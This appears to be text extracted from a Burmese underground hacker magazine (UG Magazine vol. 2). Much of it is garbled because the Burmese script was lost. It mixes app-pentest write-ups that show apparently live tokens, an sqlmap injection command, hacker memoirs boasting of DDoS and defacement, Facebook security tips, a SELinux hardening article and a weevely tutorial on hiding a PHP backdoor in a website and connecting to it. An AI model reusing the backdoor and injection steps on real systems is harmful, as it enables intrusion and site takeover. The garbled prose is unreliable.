B24565

150 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH App ။ ႔ Dictionary App ၊ Android app package SQLite ။ Database ႔ ၐ MySQL Database HTTP Web Server ႔ Database Android User Input ။ Request ႔ JSON response ။ Security ။ ႔႔ Developer ႔ ။ No System is safe ႔ S႔ ။ SQlite ႔႔ ႔ ။ Developer User Input SQL t I t ႔။ SQLite User Input SQL t D t Encrypt ႔ Insecure Data Storage ။႔ OWASP Mobile Top 10 ႔ ။ Credentials Dictionary ။ ႔ SQL Injection ။ Credentials ႔။ ။ ႔။ Product Parameter Tampering ႔ ။O ၊ ။ Credentials ႔ ။ ႔႔ ။ ႔ App Banner ။ App AA t TO ၃ ။ ႔ Real World ။ ၊ app develop ။ First Vulnerability – Insecure Direct Object Reference ( Web ) app ။ App ။ App Web Server ႔ Request Intercept (Request ) ။ Intercept Burp Suite Community Edition ။ ( Intercept Portswigger Official Documentation - Power By Union Of Underground Myanmar Hackers

151 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH https://support.portswigger.net/customer/portal/articles/1841101-configuring-an-android- device-to-work-with-burp ) Intercept App User ID Web Server Request ။ www.example.com/api/v3/users/175979?app_token=qnoykn5db1E1qxd3jma2&auth_token=2 7bgAMznQHJUQyz4pQfQ&device=A176D63A805D21A819D2F1504B14968327E73A42 175979 User ID ႔ ။ ႔ User ID Request Web Server ။ JSON R Response ။ {\"id\":175979,\"name\":\"may23\",\"dob\":0,\"city\":\" \",\"township\":\"\",\"points\":0,\"phone\":\"9 597 52632 \",\" \":\"\",\" t \":\" \",\"username\":\"may23\",\"downloads_count\":0,\"create d_at\":1495659196,\"updated_at\":1501535085,\"subscription_is_active\":false} I D tO tR ။႔ U ID ID ။Pt Parameter Manipulation ႔ Re t Parameter Tampering ၐ။ www.example.com/api/v3/users/another_value?app_token=qnoykn5db1E1qxd3jma2&auth_to ken=27bgAMznQHJUQyz4pQfQ&device=A176D63A805D21A819D2F1504B14968327E73A42 Power By Union Of Underground Myanmar Hackers

152 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Parameter Val Premium User Acc ။ is_premium=true ။( ၊ App ) {\"id\":180005,\"name\":\"somename\",\"dob\":406747800,\"city\":\" \",\"township\":\"\",\"points \":610,\" \":\"9599750 0 \",\" \":\"\",\" t \":\" \",\"username\":\"someusername\",\"do wnloads_count\":25,\"created_at\":1499016608,\"updated_at\":1501535454,\"subscription_is_activ e\":false} Points 610 Download 25 user Access t ။ Download subscription ။ Second Vulnerability – Insecure Data Storage ( Android ) AP ။ Vulnerability ႔ ႔ ႔။ /data/data/package_name/shared_prefs/ user.xml U Dt XML ။ ADB ( Android Debug Bridge ) xml file ။ ( ADB - http://adbshell.com/ ) ၊ Android P Root User Access ။ XML file ။ <?xml version='1.0' encoding='utf-8' standalone='yes' ?> <map> <string name=\"phone\">9597xx2632xx</string> <int name=\"downloads_count\" value=\"0\" /> <string name=\"state\">ßÇÉßÇ¡ßÇ»ßÇäßÇ╣ßÇ©/ßÇ╗ßÇòßÇèßÇ╣ßÇößÇÜßÇ╣ßÇ▒ßÇøßÇ╝ßÇ©ßÇòßǽ</string > <boolean name=\"subscription_is_active\" value=\"false\" /> <string name=\"operator\"></string> <string name=\"city\">ßü┐ßÇÖßÇ¡ßÇ│ßéòßÇößÇÜßÇ╣ßÇ▒ßÇøßÇ╝ßÇ©ßÇòßǽ</string> <string name=\"country\">ßÇ╗ßÇÖßÇößÇ╣ßÇÖßǼ</string> <int name=\"id\" value=\"175979\" /> <string name=\"loaded\">true</string> Power By Union Of Underground Myanmar Hackers

153 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH <string name=\"username\">may23</string> <string name=\"authentication_token\">27bgAMznQHJUQyz4pQfQ</string> <long name=\"updated_at\" value=\"1495659904\" /> <string name=\"email\"></string> <string name=\"name\">may23</string> <string name=\"dob\">0</string> <long name=\"created_at\" value=\"1495659196\" /> <string name=\"gender\"></string> <int name=\"points\" value=\"0\" /> <boolean name=\"ispremium\" value=\"false\" /> <boolean name=\"isFbRegister\" value=\"false\" /> </map> Insecure Data Storage ။D t P Tt ႔ ႔ ။ ။ ။ XML t XML Human Readable Markup XML ႔ Server R IDOR Web user access ။I J t႔ package ၊ XML file ။ ။ ? <?xml version='1.0' encoding='utf-8' standalone='yes' ?> <map> <string name=\"phone\">9599750xx0xx</string> <null name=\"facebookID\" /> <int name=\"downloads_count\" value=\"38\" /> <string name=\"state\"></string> <string name=\"operator\">blueocean</string> <boolean name=\"subscription_is_active\" value=\"true\" /> Power By Union Of Underground Myanmar Hackers

154 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH <string name=\"country\"></string> <string name=\"city\"></string> <int name=\"id\" value=\"180005\" /> <string name=\"loaded\">true</string> <string name=\"username\">someusername</string> <string name=\"authentication_token\">zZmy8xwg9zxiceJu_sVf</string> <long name=\"updated_at\" value=\"1487518144\" /> <string name=\"email\"></string> <boolean name=\"isPremium\" value=\"true\" /> <string name=\"name\">somename</string> <string name=\"dob\">406747800</string> <string name=\"gender\"></string> <long name=\"created_at\" value=\"1487502183\" /> <int name=\"points\" value=\"650\" /> <boolean name=\"ispremium\" value=\"true\" /> <boolean name=\"isFbRegister\" value=\"false\" /> </map> Web Server ။L ။ Login J App ။ User ID Request ။ ႔ Login ။ Third Vulnerability – Missing Functional Level Access Control ( Android ) AA Androidmanifest.xml file ။ tt content provide ။ File ။L A t t ။ Power By Union Of Underground Myanmar Hackers

155 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Login GreetingActivity ။ XML file edit ႔ app ။ activity manager LoginActivity Bypass ။ ADB ( ) Drozer ။( Drozer Manual - https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide- 2015-03-23.pdf ) Final Result ၐ acc U ID change ။ POC POC Power By Union Of Underground Myanmar Hackers

156 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH App Patch ။ Rt App Develop Company 250,000 MMK ။ Thin Ba Shane Power By Union Of Underground Myanmar Hackers

157 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Cryptography&Encryption For Beginner Cryptography ႔ --> (Hknudxnt) English …႔ ။ ႔ ။– ။ ႔ ၐ။ ႔ၐ ။႔ ႔။ ။ ။ ႔။ ...။ ႔ ။႔ ႔ ။႔ ႔ ။ ၍႔ ႔။ ႔ -hknudxnt ။ … ...။ ။ ။ -D E ႔ ။Y Z ႔ ။ > h---->i k---->l n---->o u---->v d---->e x---->y n---->o t---->u hknudxnt iloveyou ႔ ..။ Encryption ႔ၐ ။ Encryption - ။ Encryption Power By Union Of Underground Myanmar Hackers

158 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH 1. Plaintext ၐ iloveyou - ။ ၐၐ Encryption ႔ plaintext cleartext ။D t … ။ 2. Algorithm iloveyou hknudxnt ႔ ။( - I, l ) ႔ ႔ ႔ Algorithm ႔ Operation ၐ operation ၐ။ 3. Ciphertext tt ၐ t t ၐ data Algorithm hknudxnt … ။ C tt ။ 4. Encryption Plain text Cipher text algorithm ႔ Encryption ႔ၐ 5. Decryption ႔ Decryption ႔ ၐ ။ plain text ။ ႔ Power By Union Of Underground Myanmar Hackers

159 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH … Encryption ၊၊ … ။ ။႔ ။ၒ ။႔ ႔ Cryptography ႔၊ ။ ။႔ t။ ။ ႔C ႔ ။ ။႔ ။႔ ။ Key ႔ ။ ။ ၐ ႔t ႔ - Key ၊႔ ။ Key ၊ ။ iloveyou ႔ ။႔ key ။ ။ Power By Union Of Underground Myanmar Hackers

160 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Key 5 ။ 10 ႔ ၊3 ။ ႔ key ၊။ …။ encryption ။ Symmetric Encryption ...။ 1. Symmetric Encryption ။ ၐ ။ ႔ Key ႔ ႔ ။ encrypt ( ) ႔ Key ။ ႔။ ။။ ။ 2. Asymmetric Encryption ။ ႔။ Key Encrypt Key Public key ။ Public key ႔ ႔ ။ Private key - Private key Public Key ႔ encrypt ။ ။ Power By Union Of Underground Myanmar Hackers

161 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH - ။ ႔ ႔ Public key ။( browser ) ၍ ႔ Credit card detail encrypt browser ။ Public key Ct t ။ ႔ Private key … … Encryption Encrypt ?… ။ Encrypt ။ ။ ႔။ SSL ႔ VPN ( Custom key ႔ Encrypt Secure Sockts Layer။ Cryptography ) Encryption ။ (… ႔႔ ။ၐ ။ Decrypt ႔ … PyaeSone Thura MaungMaung (PenetstVilla) ref – Ultimate Hackers Power By Union Of Underground Myanmar Hackers

162 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH D // D ‘t Security By Sai Yar https://www.saiyar.net D D ‘t D D ‘t ။ Magazine Security Field ( Hacking & Cracking ) ႔႔ ၊ ။ Security 2008 ။ Google Talk 2007 Password & Log Recover keylogger Internet Saved Forgot Password 99.99 13 2008 2 Dr.Ox Hacking Script Kiddie ။ Dr.Ox Website Deface Power By Union Of Underground Myanmar Hackers

163 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH 2011 Hard Core ။( Bountry Root Creater Hacking ။ hacker Bug ။ Security Researcher ။ ။ Exploit ။ Zero Days physical ။ phishing social networking Keylogging and Rat ။ SE ( Not software engineering ) SE Art of SE ။ Bt ။ ။ Cybe W DDos counter ။ B tNt tt ။ server dos ။ Hacker Lammer ။ Dr-Rat ။ ၐ t mr-noob ႔ ။ t ။ ။႔ t ။ victem or zombie ။ ။ Cyber War ။ 2013 Indo ႔ ။ DDos 6000 GP OP ။၃ ။ indonesia.go.id Power By Union Of Underground Myanmar Hackers

164 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH MM ။ ။ 6000 ။ ။ ။ ႔ ၐ Bt ။ Stop Abusing Myanmar Migrant Workers >>> In Thailand ။ Et ။။ Dt ။ ။ Wt D ‘t ။ ။ Islam ။ Islam ။ ။ D ‘t t tI ‘t t ။ Data Leak C Leak CW Leak ႔ ။ Credit Card, Password, BA t t tt St Ct ။႔ ။ Ht root R ။ Confirm Phising ။ Save The Children Donate ။ D ‘t ။ Power By Union Of Underground Myanmar Hackers

165 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH M4L ႔ no ethic, no respect, no rule they are just rude ။ Facebook ႔ Facebook Social Engineering ။Facebook recovery ၐ ။ Art of exploit SE ။။ Info ။ Card Generate ။ baby punk ghot ။ :P ( Facebook image header ။ allow ။ scan ။႔ ။။ Generate ID ။ Facebook Recovery ။2007-2017 10 Recovery Mt ။ Customer Device IP Region C ။ ။ ။ BM ။ info ။ ။ trust contact ။ ။ login IP Region 4 16 Generate ။ Step 2 Auth encrypt key ။ t email encrypt t user ႔ ID decrypt key ။ ႔႔ ။ :P ။ ။ Confidential Data ႔ ။ 969 Challenge ။ Cyber Space Power By Union Of Underground Myanmar Hackers

166 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ။ ။ ။ ။ gov.mm hosting ။ Hack Cat ၐ user Webhosting C ႔ ။ Socure ၊ … D ‘t ။ Do ၁ - Security ။ ၂ - Security Research ႔ Pentest ႔ Report ။ Bounty Hunter Bt ။ ၃- Privacy ။ ၄- ။ ၅- Cyber Space ။ Do ။ D ‘t ၁- t Leak ၂- t t ။ t, t , , t t … ၃- Report bounty D t Leak ( ) Ethic ။ India t Data leak ။ bug black market ။ ၐ၁ ။ report ။ Power By Union Of Underground Myanmar Hackers

167 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ။ ethic ။ ၄- C W P W ။ 2012 2013 2014 C ။။ ႔ ။ ။ System Hack ။ ။ Hack Attacker Dt ။ t ( ။ tt t error fix Hack Hack Attacker ။။ ။ IT ။ D ( I am also Developer ) ။ Coding S Ft U Ft ။Attacker Myanmar Cyber Space Research Privacy E Gov ။ Attacker E Commerce Ethic ။ Sai Yar www.saiyar.net Power By Union Of Underground Myanmar Hackers

168 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Attacking Web Service Author : Sai Wynn Myat (Sai Lay) Contact : fb.me/lastleaf1996 , @404death Contents 0x01 : Introduction to Web Service 0x02 : Finding vulnerabilities 0x03 : Exploiting Demo 0x04 : Achievement Introduction to Web Service Web Service XML + HTTP ။ „ SOAP (Simple Object Access Protocol) „ UDDI (Universal Description, Discovery and Integration) „ WSDL (Web Services Description Language) Ct ။W S ? HTML, XML, WSDL, SOAP t access Java ။ Android App PHP ႔ Web XML data ။ Server Request WS JSON Response ။ Power By Union Of Underground Myanmar Hackers

169 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Finding Vulnerabilities Finding vulnerablities ႔ web service vulnerability ။ ) mobile application ( app ethic ႔ ။ ႔ public ) ႔ ။ Web service app enumerate app activate ။ activation code activate request Burpsuite ။ ( burpsuite security ) Request burp repeater request t ။ t database code SQL injection vulnerable ႔ ။ ( vulnerab developer ႔ ) ႔ manual ။ request post data sqli vuln check ။ response Burpsuite pro version scanner Scan ႔ ႔ request Text file save ။ Burp pro SQLmap scan ။ Power By Union Of Underground Myanmar Hackers

170 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Scan result JSON req_type is vulnerable. ႔ app SQL injection Vulnerability ။ json JSON SQL injection ႔ ၐ။ save Exploiting Demo ။ ။ Vulnerability SQLmap text file request file ။ exploit Sqlmap –r request.txt --random-agent –dbs command run SQLmap application database Database database tables ။ Power By Union Of Underground Myanmar Hackers

171 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH G0tttt it . ^_^ application tt ၊ username t ) ႔ ။A t t ( report :P “ :P ― mail application owner ။Application contact mail ။ Achievement Power By Union Of Underground Myanmar Hackers

172 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH App Vulnerability report ။ B ။Local hacked ။ app ။ security report ။ data ။ ၐ ႔ ႔ Bt ႔ report ။ :P 150,000 MMK ^_^ app ။/ ၊ t IT ။ ။ ၐ t Bounty Security Testing / Pentesting security Bug Bounty hunting ။ ။ ၊ ဏ၊ ။ HackerOne Bugcrowd ႔ B B t t Wt ။ t security testing Bt Bounty vulnerable ။ report Bounty ။ Happy hacking xD Thanks for reading Sai Wynn Myat (Sai Lay) Power By Union Of Underground Myanmar Hackers

173 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Power By Union Of Underground Myanmar Hackers

174 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Facebook Security ၊ facebook facebook Account ။ ၉ ။ ( -၁) recovery ။ (၁) ႔ Account Setting ( -၁) Account Setting  General ။  Security and Login  Privacy  Timeline and tagging Security and Login ။ ( - ၂) Security and Login facebook ႔ Login ။႔ Power By Union Of Underground Myanmar Hackers

175 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ႔ facebook Password ။ ။ ႔ facebook ႔ ၊ ႔ ။ ႔႔ ႔ ။ ၊ ႔ ႔ ၊ ၊၊ ႔ ႔ ။ ။ ( ႔ ။ ဏ t credit ။ ႔ ႔။ loggin ။ Security and Login Get alerts about unrecognized logins On ၊( D D ႔။ ႔ ၊ ႔ ႔႔ ) Choose 3 to 5 friends to contact if you get locked out tt t t ON ႔ ႔ ။( Use two-factor authentication ) ႔ ။ two step ႔ ႔ ၊ ။ ႔ ႔ ။ Power By Union Of Underground Myanmar Hackers

176 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Account Setting Privacy ။ Privacy Privacy ။႔ ႔။ ႔ ၊႔ ႔႔ ႔။ Privacy ႔ ။ Information ႔ Security It Security ႔ ။( ႔ Hacker ။ Social Enginee - ring ႔ ၐ SE ႔ ။) Public ႔ ႔ ။ facebook ။႔ ႔။ Privacy I ‘t ႔ ID ။ Power By Union Of Underground Myanmar Hackers

177 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Who can see your future post? ႔ friend only ႔ ။ ႔။ P C Pt ။ ။ ႔ ၐ ၊ ။ ။။ Who can see the people, Page and lists you follow? ၊ ႔႔ ႔ ႔ ( ၊႔ ) ( ႔ like follow see first ႔ ၊ like, follow, see first ) ။ ႔။ ႔ like, follow :-P ႔ Newsfeed ၐ ႔ follow ၊ page follow ။ Power By Union Of Underground Myanmar Hackers

178 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Who can send you friend request? Friends of friends friend request ႔ Mutual ၒ friend ။ ႔ ။ ႔ Who can see your friends list? ။ Public Post friend list Only me ။ friend list ႔ ( )။ ႔ ႔ mutual friend ႔ ။ ၐ ။ Account Setting ။ „ Who can follow me „ Public Post Comments „ Public Profile Info Power By Union Of Underground Myanmar Hackers

179 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Friends Only ။) ႔ ။ ၊ ( ႔ ။ ။ ၐ Screen Shoot ႔႔ ။ About SS ။ ။ ၐ SS Contact Info Only me ႔ Basic Info ID I ‘t ႔ ႔ ႔ ၊၊ Only me ၊ ၐ ID recovery ႔ ။႔ ႔ ID ႔။ ႔ ။ info ။ ။ ၐ SS Power By Union Of Underground Myanmar Hackers

180 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ႔ Profile picture Activity log, Update Info, View As ႔ ႔ ၐ SS Change Profile picture, Change Cover Photo, View Privacy shortcuts, Copy link to profile ႔။ View Privacy shortcuts SS ။ SS ၉% ႔႔ ။ ႔။ ၃ ႔ :-D ) recovery ( ႔ ။ Power By Union Of Underground Myanmar Hackers

181 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH How Search Engine works Ko Thet Khine Search engine ႔ Google ။ Google ႔႔ ။S E ႔ ႔ Computer science Information retrieval field AI, Machine Learning, Distributed Computing ႔ ။ Information retrieval ႔႔ tt t structure tt t ႔ ။ Google IR (web information retrieval) ႔ ။ Large scale serch engine Google index t trillion ႔ ။ process ။ Dt t tt ။ Search engine . ၃။ Crawling Indexing Searching or Ranking ။ Sergey Brin . Lawrence Page paper The Anatomy of a Large-Scale Hypertextual Web Search Engine ။ Power By Union Of Underground Myanmar Hackers

182 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Crawling ႔ ႔ ႔ internet Search ။ ။ t tၐ save ။Crawler internet ။ download pag Crawler ။ Crawler internet ။ ႔ URL Queue ။ index server ႔ link download ။ ႔ Crawl tt ။URL Queue ။ ။ web page download web page Crawler ။ < =‖‖> . page Power By Union Of Underground Myanmar Hackers

183 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH download ႔။ ႔ crawler t tၐ ။Google Crawler C ။ Distribute Crawler ။D t t ႔ download ။ geographically index server ။ crawl ။ Indexing Indexing Crawler download ႔ t ။ ႔။ ႔ t ႔။ a,and,the ႔ t ။ programming, programmer root form program t t index structure ႔ ။ information retrieval field inverted index structure ႔ ။ index ။ word ။I word web page URL ။ data storage single M SQL clustering ။ Ranking ႔ ။ Google PageRank Algorithm ။ PageRank ။ Ranking algorithm ။ PageRank income -ing link ( page . outgoing link ( page link ) ။ Incoming link ( rank ) ။ Ranking ။ rank ။ ။ Java Oracle Oracle rank ။ AI, Machine learning Google ။ Ranking ႔ St relevant ႔။ user rank ။Larry page ႔ paper ၐ paper title ႔ google ။ ။ Ko Thet Khine Power By Union Of Underground Myanmar Hackers

184 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH How to Hide Backdoor In Website ႔W t Hacking Shell ။ Admin S ။ ။ Website Backdoor shell ႔ Backdoor ။ tuto weevely ။ weevely kali linux preinstall ။ ႔t ။ Command weevely generate password /root/Desktop/backdoor.php ႔P ႔ ။ password attacker name ။ t ။ ။ ႔ Desktop backdoor.php ႔ ႔F copy ။ File texteditor ။ Power By Union Of Underground Myanmar Hackers

185 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH C copy ။ s႔ hell Site ။ php file edit paste ။ main.php backdoor ။ Power By Union Of Underground Myanmar Hackers

186 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH C file Save ။ ႔ Termianl ။ ။ ။T file path ။ weevely http://www.site.com/main.php password tt :// t/ ႔ backdoor . ။ backdoor Password ႔ t။ Backdoor ႔ ။ ႔။ Greetz : All Myanmar Black Hats Fr33d0m N00b Power By Union Of Underground Myanmar Hackers

187 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Interview with UGMH MBH ။ ။ ႔ cyber war ။ UGMH ။ ။ MBH ။ ။ ႔ UGMH ။ UGMH ။ ။ ႔ UGMH ။ MBH ။ ။UGMH T ႔ ႔။ ႔ ။ ။ ။ ႔ Team ႔ UGMH ။ ။႔ ႔ UGMH ။H T ႔ ။ ႔႔ Hacker freedom ႔ Team ႔ ႔ ။ UGMH ႔ ။ T ။ MBH ။ ႔ ။ UGMH ။ ။ၐ ႔ ႔။ ႔ UGMH ႔ ။ ။႔ ႔ cyber space ႔ ။။ ႔ ႔။ hacking ႔။ deface ။ cyber space ။ ႔ ။ ႔ ႔ ။ website D security ႔ ။ ။ Power By Union Of Underground Myanmar Hackers

188 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH MBH ။ Operation ႔ Win ႔ Zaw UGMH ။ ။ UGMH ။ MBH ။ ၐ ။ R UGMH ။ ။ ။ MBH ။ UGMH ။ ႔ Team UGMH Hacking T ႔ Team MBH ။ ႔႔ ။ ။ UGMH ။ ႔ UGMH ။UGMH cyber space ႔။ ။T ႔။ UGMH ။ ။ Team Lead ႔ ။႔ ။႔ ။ UGMH group ။ ၑ ၑ႔ ။ ႔ Protocol ။ၑ ။႔ ။ ။ Team ။ ။ ။ M4L UGMH ။။ ။ ။ ။႔ ။ ႔ UGMH ႔ ႔။ ။ ။႔ ။ ။ ။ၒ ။ ႔ page message ႔ ။ ။ ။႔ ႔ ။႔ ႔ ။ gov.mm Power By Union Of Underground Myanmar Hackers

189 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ႔ Recovery ။ ႔ ႔ Message ႔ ။ ႔႔ ။ MBH ။ ။ cyber war post ႔ ။ UGMH ။ ႔ ၊ MBH ။ ။။ UGMH ။ ႔။ ။ ။ MBH ။ ။။ ။ online banking UGMH ။ ( ၉ 48 shutdown ။။ ႔ bank online bank ။႔ ။ဏ UGMH Member ။ ႔ ။႔ ။ ။ ။ဏ ႔ ။႔ ႔။ ဏဏ ႔ ။ ႔ ။ ။ ႔M ။ UGMH ။ ။ ။ ) Power By Union Of Underground Myanmar Hackers

190 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Web Server Hacking Yan Naing Myint (Cyber Wings) ။။ ။ No lock is safe ။ Attacking Method Deface ႔ Tools ႔ Version ။ C St Red Team (Attack) ႔ Blue Team (Defense) ႔ Blue Team Defense ။ Web Server Rooting Operating System, Web Server (Apache), PHP ႔ SEL ။ SEL ။ S Rt ၄ File/Folder [x] SELinux ၏ [x] Web Application [x] User SEL S Rt ၄ Power ။ Power ႔။ 1. Power On Self Test 2. MBR/Boot Loader Check 3. Loading Kernel Power By Union Of Underground Myanmar Hackers

191 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH 4. Loading OS 5. Loading Services & Applications ၅႔ ။ Rt E t KV ၐ ။ Rt E t Kernel ႔ ။ ၐ၅ ။ Web Server Web Site Hacking Shell Et Upload Execute Server Rt Rooting Exploit ၅ ၃ ႔ ။၍ Service/Application Level Kernel Rooting ။ Rooting Kernel ႔။ Read/Write/Execute ႔ U /G Discretionary Access Control ႔ ၐ DAC P ႔ ။ Kernel Rt ႔ ႔။ Kernel Kernel System Permission Mandatory Access Control ႔ ၐ MAC P ။ MAC Permission SELinux ။ DAC R /W t /E t U /G L ႔U G P FF ႔N t I t Nt P t RT MAC Permission SA ၒ ။ SELinux Enforcing ႔ P LC Exploit Source Code Upload ႔ Compile ႔ ။ Compile ႔ Execute ႔ Rooting ၉၈ ။ ၐ ႔ MAC Permiss DAC P ႔ System DAC MAC Permission DAC ။ Configure ။ DAC ။ ႔ MAC ။ ႔ MAC Power By Union Of Underground Myanmar Hackers

192 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Photo Credit: Slide of Daniel J Walsh (Red Hat Security Team) SELinux ၏ SELinux ႔ Label Engine ။ Label UG P FF Label Label ႔N t I t Nt P t Label ႔ ။ ။ Firewall Rules Label ။ SELinux SELinux Security Context ႔ ၐ ။ ၄ SELinux Security Context SELinux User, SELinux Role, SELinux Type ႔ SELinux Levels ၄ Label Apache File R Apache (httpd) Process Label Read File Label Policy ။ (Label \"Web Application File/Folder \" ) Power By Union Of Underground Myanmar Hackers

193 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH P User File/Folder Read/Write/Execute Kernel ႔ Request Action ႔ ၄ Thread ။ ။ SELinux P ႔ ။ DAC Permission ။ ႔ DAC Permission DAC MAC MAC Permission Reject ။ ႔ DAC P MAC P ။ MAC Permission Permission ႔ Rt ။ Permission Process ႔ Allow Reject ။၍ Access Vector Cache ႔ ၐ Log SELinux ႔ ႔ Security Policy A t -R t D t R t ။ Web Application File/Folder F St t Wt Wt Web Applicat Path ႔ ။ Path ။႔ Developer Write Access St t ၐ Website/WebApp Wordpress F ။ ။ SEL file path Power By Union Of Underground Myanmar Hackers

194 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Wordpress File Structure ။ \"wp- t t‖ Folder t P T ႔ website Apache ။ wp-content Access Website t t t‖ Write ။ ႔ ႔ SELinux Type Label ႔ ― tt T Configure P Wordpress Website H PT Fi St t ၍ 404.php ႔ function.php ႔ Shell ။ ႔ wordpress file edit - tt themes ႔ plugin folder ႔ ၄ ႔ ႔ file Apache Read Access Write Access ။ SELinux Type Label \" tt t t t‖ ။ - tt uploads folder ။W U Pt F Apache Write Access ( SELinux Type Label: httpd_sys ။၄ ႔ ။႔ _rw_content_t ) ၄ Shell ။ W -S Virus ႔ S ClamAV ႔ Anti- ။ Wordpress Folder Apache R OA t tt SEL T L : tt T L : tt uploads F W D R /W t A SEL t tt ႔ ClamAV ႔ ႔H U Ct Shell ႔ Shell ႔ ။ ႔႔ File ၏ SELinux Label chcon ႔ ၐ command ၄႔ - ။ ႔ ―B / ?‖ SELinux Nt P t Label ။ Apache Process SEL L tt t t L httpd_t Network Port 80/443 ႔ Port ။ ။ Network Port Power By Union Of Underground Myanmar Hackers

195 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH User SEL DAC Permission ႔ SELinux U ။ DAC Permission ။၄ System FF ႔ P Access ႔ Permission ၍ ႔ T ။ ႔ Hacker ။ Hacker CP C L ။ ႔U Login ၍U ၄ ႔ System File Path ဏ ။ Linux User ၃ ႔။ user1 Senior System Administrator, user2 J St A tt user3 User ႔။ SELinux user1 sysadm_u user2 staff_u user3 user_u ။ user1 SELinux System Administrator Level ႔ Service St t/St /R t t Log File user data System t/ t System Administration ။J S t A tt user2 L႔ F Junior System Administrator ႔။ user_u user3 Home Directory user_home_t Label CL ႔ F /F Access System Administration ႔ ။ ။႔ ။ SELinux user_u t Network Port ႔ root password user_u User ။ user t root user Power By Union Of Underground Myanmar Hackers

196 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH \" ‖ command ၄ ႔ policycoreutils-python Package ။ SELinux ႔\" \"― \"― ႔ SELinux ။ \" ႔ SELinux ။ MAC P ။ Antivirus SELinux ႔ ( SELinux ။ SELinux Firewall Security ။ ။ ႔ All-in-One Security Solution ။ \"S DAC tE L‖ ႔ S tP Kernel Tool ။ SELinux ႔ SELinux ၊ Defensive SELinux SELinux ႔ ၊ Defensive Security ႔ Yan Naing Myint CEO, Head of Server Administration Department Cyber Wings Co., Ltd. Power By Union Of Underground Myanmar Hackers

197 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ႔ print magazine ႔ ။ PDF UGMH ႔ ။ ႔ Page ။ ႔ ။႔ ႔ ႔ ။ ။ ႔ ။ ။ ႔ ႔ ။႔ ။ ႔ ။ ႔ ။ ။ ။ ႔ MBH Magazine UGMH ။႔ ႔။ Red Bee Company LTD. ။႔ ၂ ႔ ႔႔ ။ ။ ။႔ ။ ႔။ ႔ ႔ ။ ။ Facebook page ။ ။ ။ ႔႔ ႔ ။ () ၊႔ ႔။ ႔ ႔ ၊ ။ Power By Union Of Underground Myanmar Hackers

198 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ႔ MBH UGMH ။ MHU BHA BMH MNH ႔ GHT ႔ Preview Hacking Team ။ ။ BHG HT ႔ Cover photo design ႔ D ႔ ။ ။ UG Magazine Team Power By Union Of Underground Myanmar Hackers

199 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Power By Union Of Underground Myanmar Hackers